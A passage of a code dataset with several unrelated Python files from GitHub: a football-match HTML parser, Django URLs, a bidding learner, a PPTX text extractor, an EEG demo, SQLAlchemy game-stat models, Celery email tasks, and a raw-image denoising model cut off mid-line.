return break_down_pattern_one(html_output_str, HAKEM_SEARCH_STR, end_char)\n\ndef find_away_team(html_output_str):\n # Takim2\" href=\"Default.aspx?pageId=28&kulupId=3590\">BE��KTA� A.�.<\n end_char = '<'\n return break_down_pattern_one(html_output_str, \\\n AWAY_TEAM_SEARCH_STR, end_char)\n\ndef find_home_team(html_output_str):\n # Takim1\" href=\"Default.aspx?pageId=28&kulupId=110\">VESTEL MAN�SASPOR<\n end_char = '<'\n return break_down_pattern_one(html_output_str, \\\n HOME_TEAM_SEARCH_STR, end_char)\n\ndef find_stad(html_output_str):\n # stadId=11\">ANKARA 19 MAYIS<\n end_char = '<'\n return break_down_pattern_one(html_output_str, STAD_SEARCH_STR, end_char)\n","repo_name":"folmez/TFF_crawler","sub_path":"match_crawler/match_info_extractor_tools/break_down_ID_and_name.py","file_name":"break_down_ID_and_name.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29615177529","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', # noqa\n TemplateView.as_view(template_name='pages/home.html'),\n name=\"home\"),\n url(r'^about/$',\n TemplateView.as_view(template_name='pages/about.html'),\n name=\"about\"),\n\n # 
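# (This urlconf is written in the pre-Django-1.10 style: patterns('', ...)
# with dotted-string view references such as 'students.views.rank_preference',
# and static() appended so MEDIA_URL files are served during development.)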
Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n # User management\n url(r'^users/', include(\"users.urls\", namespace=\"users\")),\n url(r'^accounts/', include('allauth.urls')),\n\n # Uncomment the next line to enable avatars\n url(r'^avatar/', include('avatar.urls')),\n\n # Your stuff: custom urls go here\n url(r'^rank-preference/$', 'students.views.rank_preference', name=\"rank-preference\"),\n url(r'^update-group/$', 'students.views.update_group', name=\"update-group\"),\n url(r'^select-group/$', 'labs.views.select_group', name=\"select-group\"),\n url(r'^results-list/$', 'students.views.results_list', name=\"results-list\"),\n url(r'^lab-results/$', 'labs.views.lab_results', name=\"lab-results\"),\n url(r'^lab-slots/$', 'labs.views.lab_slots', name=\"lab-slots\"),\n\n\n) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"jericksanjuan/lab-student-draft","sub_path":"lab_student_draft/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30675696670","text":"# ## Important libraries\n\nimport numpy as np\nimport cvxpy as cp\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import RBF\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import r2_score\nfrom tqdm import tqdm\nimport pickle\nimport re\n\n\n# function to normalize payoffs in [0,1]\n\ndef normalize_util(payoffs, min_payoff, max_payoff):\n if min_payoff == max_payoff:\n return payoffs\n payoff_range = max_payoff - min_payoff\n payoffs = np.maximum(payoffs, min_payoff)\n payoffs = np.minimum(payoffs, max_payoff)\n payoffs_scaled = (payoffs - min_payoff) / payoff_range\n return payoffs_scaled\n\n\nnormalize = np.vectorize(normalize_util)\n\n# parent class of all bidders (Random and GPMW)\n\nclass Bidder:\n def __init__(self, c_list, d_list, K, c_limit=None, d_limit=None, has_seed=False):\n self.K = K\n # if actions are provided\n if c_list and d_list:\n self.action_set = list(zip(c_list, d_list))\n self.cost = self.action_set[0]\n else:\n c_list = c_limit * np.random.sample(size=K-1)\n d_list = d_limit * np.random.sample(size=K-1)\n self.action_set = list(zip(c_list, d_list))\n # cost is a proper multiple of average bid function which is less than all of bid functions\n ratio_c = (c_list.min() / (2 * np.mean(c_list)))\n ratio_d = (d_list.min() / (2 * np.mean(d_list)))\n cost_ratio = min(ratio_c, ratio_d)\n self.cost = (np.mean(c_list) * cost_ratio, np.mean(d_list) * cost_ratio)\n \n self.weights = np.ones(K)\n self.history_payoff_profile = []\n self.history_action = []\n self.history_payoff = []\n self.cum_each_action = [0] * K\n self.played_action = None\n # to be able to reproduce exact same behavior\n self.has_seed = has_seed\n if self.has_seed:\n self.seed = np.random.randint(1, 10000)\n self.random_state = np.random.RandomState(seed=self.seed)\n\n # To clear stored data\n def restart(self):\n self.weights = np.ones(self.K)\n self.history_payoff_profile = []\n self.history_action = []\n self.history_payoff = []\n self.cum_each_action = [0] * self.K\n self.played_action = None\n if self.has_seed:\n self.random_state = np.random.RandomState(seed=self.seed)\n\n # choose action according to weights\n def choose_action(self):\n mixed_strategies = self.weights / np.sum(self.weights)\n if self.has_seed:\n choice = self.random_state.choice(len(self.action_set), 
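# GPMW_bidder below subclasses Hedge_bidder, which is not included in this
# excerpt. A minimal sketch of such a multiplicative-weights parent, assuming
# payoffs normalized to [0, max_payoff] and a standard horizon-based learning
# rate (both are assumptions, not the repository's actual code):
class Hedge_bidder(Bidder):
    def __init__(self, c_list, d_list, K, max_payoff, T, c_limit=None, d_limit=None, has_seed=False):
        super().__init__(c_list, d_list, K, c_limit=c_limit, d_limit=d_limit, has_seed=has_seed)
        self.type = 'Hedge'
        self.max_payoff = max_payoff
        self.learning_rate = np.sqrt(8 * np.log(K) / T)  # assumed schedule

    def update_weights(self, payoffs):
        # scale payoffs to [0, 1], then apply the exponential-weights update
        gains = normalize(payoffs, 0, self.max_payoff)
        self.weights = self.weights * np.exp(self.learning_rate * gains)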
p=mixed_strategies)\n else:\n choice = np.random.choice(len(self.action_set), p=mixed_strategies)\n return self.action_set[choice], choice\n \n# Bidder using Random- algorithm \n\nclass random_bidder(Bidder):\n def __init__(self, c_list, d_list, K, c_limit=None, d_limit=None, has_seed=False):\n super().__init__(c_list, d_list, K, c_limit=c_limit, d_limit=d_limit, has_seed=has_seed)\n self.type = 'random'\n\n# Bidder using GPMW Algorithm\n\nclass GPMW_bidder(Hedge_bidder):\n def __init__(self, c_list, d_list, K, max_payoff, T, beta, c_limit=None, d_limit=None, has_seed=False):\n super().__init__(c_list, d_list, K, max_payoff, T, c_limit=c_limit, d_limit=d_limit, has_seed=has_seed)\n self.type = 'GPMW'\n self.sigma = 0.01\n self.gpr = GaussianProcessRegressor(kernel=RBF(), alpha=self.sigma ** 2)\n self.gpr.optimizer = None\n self.input_history = []\n self.beta = beta\n self.max_payoff = max_payoff\n\n def restart(self):\n self.input_history = []\n super().restart()\n\n def update_weights(self, alloc_bidder, marginal_price):\n self.input_history.append([alloc_bidder, marginal_price, self.played_action[0], self.played_action[1]])\n self.gpr.fit(np.array(self.input_history), np.array(self.history_payoff))\n\n # all the input profiles that their payoffs need to be predicted\n input_predict = []\n for i in range(self.K):\n input_predict.append([alloc_bidder, marginal_price, self.action_set[i][0], self.action_set[i][1]])\n mean, std = self.gpr.predict(input_predict, return_std=True)\n payoffs = mean + self.beta * std\n super().update_weights(payoffs)\n\n","repo_name":"AregaGetaneh/Day_ahead-bidding-strategy","sub_path":"No_regret_learning_GPMW/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17225411440","text":"import io\nimport traceback\nfrom typing import IO\nfrom pptx import Presentation\nfrom pptx.util import Inches,Pt\nimport pytesseract\nfrom PIL import Image\nimport ai.get_response\n\n\n\nclass GetText:\n def __init__(self,file:IO):\n self.file = file\n\n\n async def pptx_method(self):\n text = \"\"\n presentation = Presentation(self.file)\n print(\"pptxmethod内部\")\n try:\n for slide in presentation.slides:\n for shape in slide.shapes:\n if hasattr(shape, 'text'):\n text += shape.text + '\\n'\n if shape.shape_type == 13:\n image = shape.image\n try:\n img = Image.open(io.BytesIO(image.blob))\n img = img.convert('L')\n img_text = pytesseract.image_to_string(img)\n text += img_text + '\\n'\n except Exception as e:\n print(\"有图片异常\")\n # 检查是否有text\n if not text:\n print(\"no text\")\n \n self.text = text\n #存数据库\n print(\"pptx发送ai\")\n result = await self.send_to_ai(self.text)\n return result \n \n except Exception as e:\n print(\"读取文件内容异常\")\n print(traceback.format_exc())\n return \"读取文件异常\"\n\n async def ppt_method(self):\n print(\"ppt file\")\n return \"无法解析ppt文件,正在加紧开发,请尝试使用其他网站转换文件格式或者使用PowerPoint将ppt文件改成pptx文件再使用\"\n \n async def send_to_ai(self,alltext):\n print(\"send to ai\")\n operate =ai.get_response.response(alltext)\n result = await operate.complete()\n return result\n \n\n\n","repo_name":"wangcham/ppt_killer","sub_path":"backend/service/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"16116028714","text":"\"\"\"\ndemonstration of the EEG burst detector\n\nJohn M. 
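# (On the pptx extractor above: in python-pptx, shape_type 13 is a Picture,
# so that branch OCRs embedded images by opening shape.image.blob with PIL,
# converting to grayscale ('L'), and running pytesseract over the result.)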
O' Toole, University College Cork\nStarted: 28-11-2019\nlast update: Time-stamp: <2019-12-11 12:17:07 (otoolej)>\n\"\"\"\nimport numpy as np\nfrom burst_detector import eeg_burst_detector, utils\nfrom matplotlib import pyplot as plt\n\n\n# 1. generate a test signal with impulsive noise\nN = 5000\nFs = 64\nx = utils.gen_impulsive_noise(N)\n\n\n# 2. run the burst detector on the test signal:\nburst_anno, svm_out = eeg_burst_detector.eeg_bursts(x, Fs)\n\n\n# 3. plot:\nttime = np.arange(N) / Fs\nfig, ax = plt.subplots(nrows=2, ncols=1, num=1, clear=True, sharex=True)\nax[0].plot(ttime, x, label='test signal')\nax[1].plot(ttime, burst_anno, label='burst annotation')\nax[1].plot(ttime, svm_out, label='SVM output')\nax[1].legend(loc='upper right')\nax[0].legend(loc='upper left')\nplt.xlabel('time (seconds)')\n\n","repo_name":"otoolej/py_burst_detector","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"965569342","text":"from sqlalchemy import Column, Table, Integer, ForeignKey, create_engine, String, Boolean, Numeric, DateTime, func\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\n\n__author__ = 'Greg'\n\nengine = create_engine('postgresql://postgres:postgres@localhost:5432/yolobid', echo=True)\nSession = sessionmaker(bind=engine)\nBase = declarative_base()\n\nteam_player = Table('team_player', Base.metadata,\n Column('team_id', Integer, ForeignKey('team.id')),\n Column('player_id', Integer, ForeignKey('player.id'))\n )\n\n\nclass TimestampMixin(object):\n created_date = Column(DateTime, default=func.now())\n\n\nclass Tournament(Base, TimestampMixin):\n \"\"\"Tournament object\"\"\"\n __tablename__ = 'tournament'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n region = Column(String)\n year = Column(Integer)\n season = Column(String)\n games = relationship('Game', backref=\"tournament\")\n data_sources = relationship('DataSource', backref=\"tournament\")\n\n def __str__(self):\n return 'id: {}, name: {}, external_location: {}, games: {}'.format\\\n (self.id, self.name, self.external_location, self.data_sources)\n\n\nclass DataSource(Base, TimestampMixin):\n \"\"\"DataSource object\"\"\"\n __tablename__ = 'data_source'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n external_location = Column(String)\n games = relationship('Game', backref=\"data_source\")\n tournament_id = Column(Integer, ForeignKey('tournament.id'))\n\n def __str__(self):\n return 'id: {}, name: {}, external_location: {}, games: {}'.format\\\n (self.id, self.name, self.external_location, self.games)\n\n\nclass Game(Base, TimestampMixin):\n \"\"\"Game object\"\"\"\n __tablename__ = 'game'\n id = Column(Integer, primary_key=True)\n game_length_minutes = Column(Numeric)\n external_id = Column(Integer)\n data_source_id = Column(Integer, ForeignKey('data_source.id'))\n tournament_id = Column(Integer, ForeignKey('tournament.id'))\n team_stats = relationship('TeamStats', backref='game')\n player_stats = relationship('PlayerStats', backref='game')\n\n\n\n def __str__(self):\n return 'id: {}, teams: {}, game_length: {}, external_id: {}, data_source_id: {}'.format\\\n (self.id, self.teams, self.game_length_minutes, self.external_id, self.data_source_id)\n\n\nclass Team(Base, TimestampMixin):\n \"\"\"Team object\"\"\"\n __tablename__ = 'team'\n id = Column(Integer, primary_key=True)\n name = 
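# Usage sketch for these models (hypothetical values), reusing the Session
# factory defined at the top of this module:
#
# session = Session()
# session.add(Tournament(name='LCS', region='NA', year=2015, season='Summer'))
# session.commit()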
Column(String)\n external_name = Column(String)\n external_id = Column(Integer)\n team_stats = relationship(\"TeamStats\", backref='team')\n player_stats = relationship('PlayerStats', backref='teams')\n players = relationship('Player', secondary=team_player, backref='teams')\n\n\n def __str__(self):\n return 'id: {}, name: {}, external_name: {}, external_id: {}, team_stats: {}, players {}'.format\\\n (self.id, self.name, self.external_name, self.external_id, self.team_stats, self.players)\n\n\nclass Player(Base, TimestampMixin):\n \"\"\"Player Object\"\"\"\n __tablename__ = 'player'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n role = Column(String)\n image = Column(String)\n external_id = Column(String)\n player_stats = relationship(\"PlayerStats\", backref='player')\n\n\nclass TeamStats(Base, TimestampMixin):\n \"\"\"TeamStats Object\"\"\"\n __tablename__ = 'team_stats'\n id = Column(Integer, primary_key=True)\n total_gold = Column(String)\n won = Column(Boolean)\n color = Column(String)\n deaths = Column(Integer)\n minions_killed = Column(Integer)\n assists = Column(Integer)\n kills = Column(Integer)\n gold = Column(Integer)\n barons = Column(Integer)\n dragons = Column(Integer)\n turrets = Column(Integer)\n team_id = Column(Integer, ForeignKey('team.id'))\n game_id = Column(Integer, ForeignKey('game.id'))\n game_number = Column(Integer)\n\n def __str__(self):\n return 'id: {}, total_gold: {}, won: {}, color: {}, deaths: {}, minions_killed: {}, assists: {}, kills: {},' \\\n 'gold: {}, barons: {}, dragons: {}, team_id: {}, game_number: {}'.format\\\n (self.id, self.total_gold, self.won, self.color, self.deaths, self.minions_killed, self.assists, self.kills,\n self.gold, self.barons, self.dragons, self.team_id, self.game_number)\n\n\nclass PlayerStats(Base, TimestampMixin):\n \"\"\"PlayerStats Object\"\"\"\n __tablename__ = 'player_stats'\n id = Column(Integer, primary_key=True)\n champion_played = Column(String)\n kills = Column(Integer)\n deaths = Column(Integer)\n assists = Column(Integer)\n gold = Column(Integer)\n minions_killed = Column(Integer)\n game_id = Column(Integer, ForeignKey('game.id'))\n team_id = Column(Integer, ForeignKey('team.id'))\n player_id = Column(Integer, ForeignKey('player.id'))\n\n\n\n\nBase.metadata.create_all(engine)\n# print(Base.metadata.sorted_tables)\n# for tbl in reversed(Base.metadata.sorted_tables):\n# print(tbl)\n# engine.execute(tbl.drop())\n","repo_name":"gregorylivschitz/league_playoff_game_predictor","sub_path":"entities/league_of_legends_entities.py","file_name":"league_of_legends_entities.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19942717805","text":"from django.core.mail import send_mail\nfrom django.conf import settings\n\nfrom celery import shared_task\n\nfrom .utils import new_comment_notification\nfrom api.models import Comment, Post\n\n\n@shared_task\ndef send_email_notifocation(post_id, comment_id):\n '''Send new comments notification'''\n post = Post.objects.select_related(\n 'author', 'root_comment').get(id=post_id)\n comment = Comment.objects.select_related('author').get(id=comment_id)\n\n if not post.author.is_online:\n send_mail(\n 'Your post is commented',\n f'Hey, you got a new comment from user: @{comment.author.username} : {comment.content}',\n settings.EMAIL_INFORMER,\n [post.author.email, ],\n fail_silently=False,\n )\n return 'OK'\n return 'TASK END'\n\n\n@shared_task\ndef add(x, y):\n return x 
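# Usage note: Celery tasks are normally enqueued rather than called inline,
# e.g. send_email_notifocation.delay(post.id, comment.id) or, for the demo
# task here, add.delay(2, 3); a plain call like add(2, 3) simply runs
# synchronously in the current process.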
+ y","repo_name":"girik108/kvartirka_test","sub_path":"kvartirka/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3795855433","text":"import torch\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\n\r\nimport os\r\nimport numpy as np\r\nimport fnmatch\r\nfrom collections import OrderedDict\r\n\r\nimport util.util as util\r\nimport util.index as index\r\nimport models.networks as networks\r\nfrom models import arch, losses\r\n\r\nfrom .base_model import BaseModel\r\nfrom PIL import Image\r\nfrom os.path import join\r\n\r\nimport rawpy\r\nimport util.process as process\r\nfrom torchvision.utils import save_image\r\n\r\ndef tensor2im(image_tensor, visualize=False, video=False): \r\n image_tensor = image_tensor.detach()\r\n\r\n if visualize: \r\n image_tensor = image_tensor[:, 0:3, ...]\r\n\r\n if not video: \r\n image_numpy = image_tensor[0].cpu().float().numpy()\r\n image_numpy = (np.transpose(image_numpy, (1, 2, 0))) * 255.0\r\n else:\r\n image_numpy = image_tensor.cpu().float().numpy()\r\n image_numpy = (np.transpose(image_numpy, (0, 2, 3, 1))) * 255.0\r\n\r\n image_numpy = np.clip(image_numpy, 0, 255)\r\n\r\n return image_numpy\r\n\r\n\r\ndef postprocess_bayer(rawpath, img4c):\r\n img4c = img4c.detach()\r\n img4c = img4c[0].cpu().float().numpy()\r\n img4c = np.clip(img4c, 0, 1)\r\n\r\n #unpack 4 channels to Bayer image\r\n raw = rawpy.imread(rawpath)\r\n raw_pattern = raw.raw_pattern\r\n R = np.where(raw_pattern==0)\r\n G1 = np.where(raw_pattern==1)\r\n G2 = np.where(raw_pattern==3)\r\n B = np.where(raw_pattern==2)\r\n \r\n black_level = np.array(raw.black_level_per_channel)[:,None,None]\r\n\r\n white_point = 16383\r\n\r\n img4c = img4c * (white_point - black_level) + black_level\r\n \r\n img_shape = raw.raw_image_visible.shape\r\n H = img_shape[0]\r\n W = img_shape[1]\r\n\r\n raw.raw_image_visible[R[0][0]:H:2, R[1][0]:W:2] = img4c[0, :,:]\r\n raw.raw_image_visible[G1[0][0]:H:2,G1[1][0]:W:2] = img4c[1, :,:]\r\n raw.raw_image_visible[B[0][0]:H:2,B[1][0]:W:2] = img4c[2, :,:]\r\n raw.raw_image_visible[G2[0][0]:H:2,G2[1][0]:W:2] = img4c[3, :,:]\r\n \r\n # out = raw.postprocess(use_camera_wb=False, user_wb=[1,1,1,1], half_size=True, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None)\r\n # out = raw.postprocess(use_camera_wb=False, user_wb=[1.96875, 1, 1.444, 1], half_size=True, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None) \r\n out = raw.postprocess(use_camera_wb=True, half_size=True, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None)\r\n return out\r\n\r\n\r\ndef postprocess_bayer_v2(rawpath, img4c): \r\n with rawpy.imread(rawpath) as raw:\r\n out_srgb = process.raw2rgb_postprocess(img4c.detach(), raw) \r\n \r\n return out_srgb\r\n\r\n\r\ndef postprocess_xtrans(rawpath, img9c):\r\n img9c = img9c.detach()\r\n img9c = img9c[0].cpu().float().numpy()\r\n img9c = np.clip(img9c, 0, 1)\r\n\r\n #unpack 9 channels to xtrans image\r\n raw = rawpy.imread(rawpath)\r\n img_shape = raw.raw_image_visible.shape\r\n H = (img_shape[0] // 6) * 6\r\n W = (img_shape[1] // 6) * 6\r\n \r\n black_level = 1024\r\n white_point = 16383\r\n\r\n img9c = img9c * (white_point - black_level) + black_level\r\n\r\n # 0 R\r\n raw.raw_image_visible[0:H:6, 0:W:6] = img9c[0, 0::2, 0::2]\r\n raw.raw_image_visible[0:H:6, 4:W:6] = img9c[0, 0::2, 1::2]\r\n raw.raw_image_visible[3:H:6, 1:W:6] = img9c[0, 
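# postprocess_bayer above undoes the [0, 1] normalization (per-channel black
# level, white point 16383), writes the four planes (R, G1, B, G2) back into
# their 2x2-strided mosaic positions located via raw_pattern, and lets rawpy
# run the camera ISP; postprocess_xtrans here does the same for the 6x6
# X-Trans pattern with nine channels.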
1::2, 0::2]\r\n raw.raw_image_visible[3:H:6, 3:W:6] = img9c[0, 1::2, 1::2]\r\n\r\n # 1 G\r\n raw.raw_image_visible[0:H:6, 2:W:6] = img9c[1, 0::2, 0::2]\r\n raw.raw_image_visible[0:H:6, 5:W:6] = img9c[1, 0::2, 1::2]\r\n raw.raw_image_visible[3:H:6, 2:W:6] = img9c[1, 1::2, 0::2]\r\n raw.raw_image_visible[3:H:6, 5:W:6] = img9c[1, 1::2, 1::2]\r\n\r\n # 1 B\r\n raw.raw_image_visible[0:H:6, 1:W:6] = img9c[2, 0::2, 0::2]\r\n raw.raw_image_visible[0:H:6, 3:W:6] = img9c[2, 0::2, 1::2]\r\n raw.raw_image_visible[3:H:6, 0:W:6] = img9c[2, 1::2, 0::2]\r\n raw.raw_image_visible[3:H:6, 4:W:6] = img9c[2, 1::2, 1::2]\r\n\r\n # 4 R\r\n raw.raw_image_visible[1:H:6, 2:W:6] = img9c[3, 0::2, 0::2]\r\n raw.raw_image_visible[2:H:6, 5:W:6] = img9c[3, 0::2, 1::2] \r\n raw.raw_image_visible[5:H:6, 2:W:6] = img9c[3, 1::2, 0::2] \r\n raw.raw_image_visible[4:H:6, 5:W:6] = img9c[3, 1::2, 1::2] \r\n\r\n # 5 B\r\n raw.raw_image_visible[2:H:6, 2:W:6] = img9c[4, 0::2, 0::2]\r\n raw.raw_image_visible[1:H:6, 5:W:6] = img9c[4, 0::2, 1::2]\r\n raw.raw_image_visible[4:H:6, 2:W:6] = img9c[4, 1::2, 0::2]\r\n raw.raw_image_visible[5:H:6, 5:W:6] = img9c[4, 1::2, 1::2]\r\n\r\n raw.raw_image_visible[1:H:3, 0:W:3] = img9c[5, :, :]\r\n raw.raw_image_visible[1:H:3, 1:W:3] = img9c[6, :, :]\r\n raw.raw_image_visible[2:H:3, 0:W:3] = img9c[7, :, :]\r\n raw.raw_image_visible[2:H:3, 1:W:3] = img9c[8, :, :]\r\n \r\n out = raw.postprocess(use_camera_wb=True, half_size=True, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None)\r\n # out = raw.postprocess(use_camera_wb=True, demosaic_algorithm=rawpy.DemosaicAlgorithm.LINEAR, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None)\r\n return out\r\n\r\n\r\nclass IlluminanceCorrect(nn.Module):\r\n def __init__(self):\r\n super(IlluminanceCorrect, self).__init__()\r\n \r\n # Illuminance Correction\r\n def forward(self, predict, source):\r\n if predict.shape[0] != 1:\r\n output = torch.zeros_like(predict)\r\n if source.shape[0] != 1:\r\n for i in range(predict.shape[0]):\r\n output[i:i+1, ...] = self.correct(predict[i:i+1, ...], source[i:i+1, ...]) \r\n else: \r\n for i in range(predict.shape[0]):\r\n output[i:i+1, ...] 
= self.correct(predict[i:i+1, ...], source) \r\n else:\r\n output = self.correct(predict, source)\r\n return output\r\n\r\n def correct(self, predict, source):\r\n N, C, H, W = predict.shape \r\n predict = torch.clamp(predict, 0, 1)\r\n assert N == 1\r\n output = torch.zeros_like(predict, device=predict.device)\r\n pred_c = predict[source != 1]\r\n source_c = source[source != 1]\r\n \r\n num = torch.dot(pred_c, source_c)\r\n den = torch.dot(pred_c, pred_c) \r\n output = num / den * predict\r\n # print(num / den)\r\n\r\n return output\r\n\r\n\r\nclass ELDModelBase(BaseModel):\r\n def set_input(self, data, mode='train'):\r\n target = None\r\n data_name = None\r\n\r\n mode = mode.lower()\r\n if mode == 'train':\r\n input, target, self.ratio, self.K = data['input'], data['target'], data[\"ratio\"], data[\"K\"]\r\n elif mode == 'eval':\r\n input, target, data_name, self.ratio, self.K = data['input'], data['target'], data['fn'], data[\"ratio\"], data[\"K\"].item()\r\n elif mode == 'test':\r\n input, data_name = data['input'], data['fn']\r\n else:\r\n raise NotImplementedError('Mode [%s] is not implemented' % mode)\r\n \r\n if len(self.gpu_ids) > 0: # transfer data into gpu\r\n input = input.to(device=self.gpu_ids[0])\r\n if target is not None:\r\n target = target.to(device=self.gpu_ids[0]) \r\n\r\n self.input = input\r\n self.target = target\r\n self.data_name = data_name\r\n\r\n self.rawpath = data['rawpath'][0] if 'rawpath' in data else None\r\n self.cfa = data['cfa'][0] if 'cfa' in data else 'bayer'\r\n\r\n # self.issyn = False if 'real' in data else True\r\n self.aligned = False if 'unaligned' in data else True\r\n\r\n \r\n def eval(self, data, savedir=None, suffix=None, correct=False, crop=True, frame_id=None, iter_num=0, old_diffusion=False):\r\n # only the 1st input of the whole minibatch would be evaluated\r\n self._eval()\r\n self.set_input(data, 'eval')\r\n\r\n # if self.data_name is not None and savedir is not None:\r\n # name = os.path.splitext(os.path.basename(self.data_name[0]))[0]\r\n # if not os.path.exists(join(savedir, name)):\r\n # os.makedirs(join(savedir, name))\r\n \r\n # for fn in os.listdir(join(savedir, name)): \r\n # if fnmatch.fnmatch(fn, '*{}_*'.format(self.opt.name)):\r\n # return {}\r\n\r\n with torch.no_grad():\r\n ### evaluate center region to avoid fixed pattern noise\r\n cropx = 512; cropy = 512\r\n if crop:\r\n self.target = util.crop_center(self.target, cropx, cropy)\r\n self.input = util.crop_center(self.input, cropx, cropy)\r\n if not old_diffusion:\r\n if not self.opt.chop:\r\n self.target, para = util.auto_padding(self.target, scale=16)\r\n self.input, para = util.auto_padding(self.input, scale=16)\r\n output_list = self.forward(iter_num=iter_num)\r\n self.output = output_list[0]\r\n else:\r\n ABLATION_NUM = 0\r\n num_steps = 3\r\n if ABLATION_NUM == 0:\r\n def to_photon(x, ratio, K):\r\n # x: 0-1 image\r\n return x/ratio/K*15583\r\n def to_image(x, ratio_next, target_ratio, K):\r\n return x/ratio_next*target_ratio*K/15583\r\n ratio = int(self.ratio)\r\n ratio_list = [1,50, 100]\r\n # ratio_list = [1,2, 3]\r\n # ratio_list =sorted(set(np.logspace(np.log10(1),np.log10(300),num_steps).astype(int)))\r\n # ratio_list =[1,3]\r\n # ratio_list =sorted(set(np.logspace(np.log10(1),np.log10(3),10).astype(float)))\r\n for i in range(len(ratio_list)-1):\r\n output_list = self.forward()\r\n self.output = output_list[0]\r\n ratio_current, ratio_next = ratio_list[i], ratio_list[i+1]\r\n self.input = to_image(to_photon(self.input.clamp(0,1), ratio/ratio_current, self.K) + 
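# (In IlluminanceCorrect.correct above, num / den = <pred, src> / <pred, pred>
# is the closed-form scalar a that minimizes ||a * pred - src||^2, i.e. a
# global least-squares gain matching the prediction's brightness to the
# source; pixels where source == 1 are excluded, presumably as saturated.)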
torch.poisson(to_photon(output.clamp(0,1), ratio/(ratio_next-ratio_current), self.K)), ratio_next, ratio, self.K)\r\n \r\n # self.input = to_image(to_photon(self.input, ratio, self.K)*ratio_current + to_photon(output, ratio, self.K)*(ratio_next-ratio_current), ratio_next, ratio, self.K)\r\n output_list = self.forward()\r\n self.output = output[0]\r\n # elif ABLATION_NUM == 1:\r\n # for i in range(num_steps):\r\n # self.input = self.forward()\r\n # self.output=self.input\r\n \r\n # elif ABLATION_NUM == 2:\r\n # original_input = self.input\r\n # for i in range(1,num_steps+1):\r\n # self.output = self.forward()\r\n # self.input = self.output * i/num_steps + (num_steps-i)/num_steps*original_input\r\n\r\n if not self.opt.chop:\r\n self.input = F.pad(self.input, para)\r\n self.target = F.pad(self.target, para)\r\n self.output = F.pad(self.output, para)\r\n if correct:\r\n self.output = self.corrector(self.output, self.target)\r\n \r\n if self.opt.stage_out == 'raw' and self.opt.stage_eval == 'srgb':\r\n target = postprocess_bayer_v2(self.rawpath, self.target)\r\n output = postprocess_bayer_v2(self.rawpath, self.output)\r\n input = postprocess_bayer_v2(self.rawpath, self.input)\r\n else:\r\n output = self.output\r\n target = self.target\r\n input = self.input\r\n\r\n output = tensor2im(output)\r\n target = tensor2im(target) \r\n input = tensor2im(input)\r\n\r\n if target.shape[0] != output.shape[0]:\r\n target = np.repeat(target, output.shape[0], axis=0)\r\n\r\n res = index.quality_assess(output, target, data_range=255)\r\n res_in = index.quality_assess(input, target, data_range=255) \r\n\r\n if savedir is not None and not crop:\r\n ## raw postprocessing\r\n if self.rawpath:\r\n if self.cfa == 'bayer':\r\n output = postprocess_bayer(self.rawpath, self.output)\r\n target = postprocess_bayer(self.rawpath, self.target)\r\n input = postprocess_bayer(self.rawpath, self.input)\r\n\r\n # target = tensor2im(postprocess_bayer_v2(self.rawpath, self.target))\r\n # output = tensor2im(postprocess_bayer_v2(self.rawpath, self.output))\r\n # input = tensor2im(postprocess_bayer_v2(self.rawpath, self.input))\r\n\r\n elif self.cfa == 'xtrans':\r\n output = postprocess_xtrans(self.rawpath, self.output)\r\n target = postprocess_xtrans(self.rawpath, self.target)\r\n input = postprocess_xtrans(self.rawpath, self.input)\r\n else:\r\n raise NotImplementedError\r\n\r\n if self.data_name is not None:\r\n if \"ELD\" in self.data_name[0]:\r\n name = \"_\".join(self.data_name[0].split(\"/\")[-2:]).split(\".\")[0]\r\n else:\r\n name = os.path.splitext(os.path.basename(self.data_name[0]))[0]\r\n\r\n if not os.path.exists(join(savedir, name)):\r\n os.makedirs(join(savedir, name))\r\n\r\n if frame_id is not None:\r\n if not os.path.exists(join(savedir, name, self.opt.name)):\r\n os.makedirs(join(savedir, name, self.opt.name))\r\n\r\n if not os.path.exists(join(savedir, name, 'input')):\r\n os.makedirs(join(savedir, name, 'input')) \r\n\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, name, self.opt.name, '{}_{:.2f}.png'.format(frame_id, res['PSNR'])))\r\n\r\n if not os.path.exists(join(savedir, name, 'input', 